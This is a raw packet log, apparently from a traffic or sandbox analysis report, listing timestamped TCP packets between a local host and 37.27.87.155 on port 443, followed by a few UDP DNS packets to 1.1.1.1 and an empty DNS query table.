Apr 30, 2024 07:44:22.565099001 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.565543890 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.565562963 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.565623045 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.565638065 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.565686941 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.568841934 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.568857908 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.568922997 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.568937063 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.568988085 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.571439981 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.571456909 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.571522951 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.571537018 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.571587086 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.574055910 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.574073076 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.574140072 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.574153900 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.574204922 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.576719046 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.576735973 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.576792002 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.576811075 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.576833010 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.576858044 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.579732895 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.579747915 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.579823971 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.579838991 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.579890013 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.582267046 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.582292080 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.582336903 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.582354069 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.582376003 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.582396984 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.585149050 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.585165977 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.585237026 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.585256100 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.585308075 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.587224960 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.587240934 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.587305069 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.587318897 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.587368965 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.590238094 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.590254068 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.590307951 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.590361118 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.590399981 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.590421915 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.592736006 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.592751980 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.592839956 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.592864990 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.592911005 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.595132113 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.595149040 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.595230103 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.595264912 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.595319033 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.598215103 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.598232031 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.598287106 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.598325014 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.598356009 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.598377943 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.601272106 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.601291895 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.601341963 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.601361990 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.601385117 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.601406097 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.603816032 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.603832006 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.603892088 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.603910923 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.603933096 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.603955030 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.606304884 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.606327057 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.606375933 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.606395006 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.606416941 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.606442928 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.610507965 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.610524893 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.610579967 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.610598087 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.610621929 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.610644102 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.613070011 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.613111019 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.613146067 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.613152027 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.613164902 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.613198996 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.613501072 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.613532066 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.710376978 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.710408926 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.710484982 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.710731983 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.710746050 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:23.149645090 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:23.149859905 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:23.150650978 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:23.150667906 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:23.150836945 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:23.150841951 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:23.844932079 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:23.844959974 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:23.844980955 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:23.845032930 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:23.845065117 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:23.845077991 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:23.845130920 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:23.944272041 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:23.944303989 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:23.944391012 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:23.944407940 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:23.945049047 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.086436033 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.086462975 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.086544037 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.086568117 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.086606026 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.188091040 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.188122034 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.188194990 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.188220978 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.188265085 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.262010098 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.262032986 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.262104988 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.262135029 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.262173891 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.310823917 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.310858965 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.310935974 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.310947895 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.310987949 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.353930950 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.353957891 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.354043007 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.354052067 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.354091883 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.393779039 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.393807888 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.393881083 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.393891096 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.393923044 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.436769962 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.436790943 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.436897039 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.436923027 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.436939955 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.436969042 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.480380058 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.480413914 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.480585098 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.480598927 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.480635881 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.514780998 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.514801025 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.514847994 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.514859915 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.514899015 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.539902925 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.539928913 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.539999962 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.540009975 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.540021896 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.540045023 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.564135075 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.564156055 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.564232111 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.564244032 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.564280033 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.584822893 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.584845066 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.584908962 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.584920883 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.584956884 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.605628014 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.605649948 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.605734110 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.605742931 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.605778933 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.620582104 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.620618105 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.620681047 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.620687008 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.620738029 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.621133089 CEST	49723	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.621150017 CEST	443	49723	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.648628950 CEST	49724	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.648658991 CEST	443	49724	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:24.648720026 CEST	49724	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.648929119 CEST	49724	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:24.648942947 CEST	443	49724	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:25.094012976 CEST	443	49724	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:25.094096899 CEST	49724	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:25.094674110 CEST	49724	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:25.094682932 CEST	443	49724	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:25.094794989 CEST	49724	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:25.094800949 CEST	443	49724	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:25.797923088 CEST	443	49724	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:25.797945023 CEST	443	49724	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:25.797960997 CEST	443	49724	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:25.798062086 CEST	49724	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:25.798095942 CEST	443	49724	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:25.798113108 CEST	49724	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:25.798147917 CEST	49724	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:25.897126913 CEST	443	49724	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:25.897146940 CEST	443	49724	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:25.897243023 CEST	49724	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:25.897258997 CEST	443	49724	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:25.897300005 CEST	49724	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:26.040613890 CEST	443	49724	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:26.040633917 CEST	443	49724	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:26.040883064 CEST	49724	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:26.040914059 CEST	443	49724	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:26.040961027 CEST	49724	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:26.144382954 CEST	443	49724	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:26.144403934 CEST	443	49724	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:26.144620895 CEST	49724	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:26.144639969 CEST	443	49724	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:26.144681931 CEST	49724	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:26.207607985 CEST	443	49724	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:26.207660913 CEST	443	49724	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:26.207690954 CEST	443	49724	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:26.207732916 CEST	49724	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:26.207802057 CEST	49724	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:26.208597898 CEST	49724	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:26.208616972 CEST	443	49724	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:26.600188017 CEST	49725	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:26.600238085 CEST	443	49725	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:26.600315094 CEST	49725	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:26.600723028 CEST	49725	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:26.600737095 CEST	443	49725	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:27.042618036 CEST	443	49725	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:27.042746067 CEST	49725	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:27.043370008 CEST	49725	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:27.043382883 CEST	443	49725	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:27.043524027 CEST	49725	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:27.043529987 CEST	443	49725	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:27.916167974 CEST	443	49725	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:27.916210890 CEST	443	49725	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:27.916269064 CEST	49725	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:27.916290998 CEST	443	49725	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:27.916302919 CEST	49725	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:27.916305065 CEST	443	49725	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:27.916336060 CEST	49725	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:27.916363001 CEST	49725	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:27.916680098 CEST	49725	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:27.916695118 CEST	443	49725	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:27.919833899 CEST	49726	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:27.919888020 CEST	443	49726	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:27.919975042 CEST	49726	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:27.920368910 CEST	49726	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:27.920386076 CEST	443	49726	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:28.359543085 CEST	443	49726	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:28.359636068 CEST	49726	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:28.360168934 CEST	49726	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:28.360198021 CEST	443	49726	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:28.360368013 CEST	49726	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:28.360382080 CEST	443	49726	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:29.228868008 CEST	443	49726	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:29.228889942 CEST	443	49726	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:29.228949070 CEST	443	49726	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:29.228965044 CEST	49726	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:29.228991032 CEST	49726	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:29.229017973 CEST	49726	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:29.573267937 CEST	49726	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:29.573304892 CEST	443	49726	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:31.857549906 CEST	49727	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:31.857599974 CEST	443	49727	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:31.857688904 CEST	49727	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:31.857950926 CEST	49727	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:31.857964039 CEST	443	49727	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:32.297856092 CEST	443	49727	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:32.297966003 CEST	49727	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:32.298651934 CEST	49727	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:32.298667908 CEST	443	49727	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:32.298834085 CEST	49727	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:32.298839092 CEST	443	49727	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:32.298897982 CEST	49727	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:32.298911095 CEST	443	49727	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:32.298985958 CEST	49727	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:32.299006939 CEST	443	49727	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:32.299074888 CEST	49727	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:32.299089909 CEST	443	49727	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:32.861943007 CEST	49728	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:32.861975908 CEST	443	49728	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:32.862185001 CEST	49728	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:32.862411976 CEST	49728	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:32.862421989 CEST	443	49728	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:33.304912090 CEST	443	49728	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:33.307157040 CEST	49728	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:33.307737112 CEST	49728	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:33.307750940 CEST	443	49728	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:33.308007002 CEST	49728	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:33.308007002 CEST	49728	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:33.308016062 CEST	443	49728	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:33.308027983 CEST	443	49728	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:33.724056005 CEST	443	49727	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:33.724148035 CEST	443	49727	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:33.724184036 CEST	49727	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:33.724240065 CEST	49727	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:33.725356102 CEST	49727	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:33.725379944 CEST	443	49727	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:33.898013115 CEST	49729	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:33.898067951 CEST	443	49729	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:33.898148060 CEST	49729	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:33.898428917 CEST	49729	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:33.898443937 CEST	443	49729	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:34.294730902 CEST	443	49728	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:34.294806957 CEST	443	49728	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:34.294833899 CEST	49728	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:34.294848919 CEST	49728	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:34.340234041 CEST	443	49729	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:34.340327024 CEST	49729	443	192.168.2.8	37.27.87.155

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 30, 2024 07:42:33.528533936 CEST	59157	53	192.168.2.8	1.1.1.1
Apr 30, 2024 07:42:33.677962065 CEST	53	59157	1.1.1.1	192.168.2.8
Apr 30, 2024 07:43:52.938895941 CEST	59917	53	192.168.2.8	1.1.1.1
Apr 30, 2024 07:43:53.041352987 CEST	53	59917	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
